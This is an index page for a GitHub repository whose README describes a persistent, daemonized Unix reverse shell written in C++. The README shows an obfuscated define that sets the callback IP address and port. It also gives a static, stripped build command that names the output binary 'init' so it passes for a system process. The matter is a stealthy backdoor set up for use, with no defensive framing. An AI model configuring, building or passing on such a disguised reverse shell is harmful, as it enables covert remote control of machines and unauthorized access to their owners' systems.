Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sin3point14/unix-reverse-shell
https://github.com/sin3point14/unix-reverse-shell
Last synced: 24 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/sin3point14/unix-reverse-shell
- Owner: sin3point14
- Created: 2022-06-23T09:32:10.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2022-06-23T09:39:33.000Z (over 2 years ago)
- Last Synced: 2023-03-03T13:47:14.349Z (over 1 year ago)
- Language: C++
- Size: 1.95 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
### persistent daemonized reverse shell
Change with your public IP and open port in `daemon_shell.cpp`
```c
#define REMOTE_ADDR OBFUSCATE("207.46.148.7")
#define REMOTE_PORT 5069
```compile with
```bash
g++ daemon_shell.cpp -O3 -march=native -fPIC -g -s -static -o ./init
```output binary will be named init :)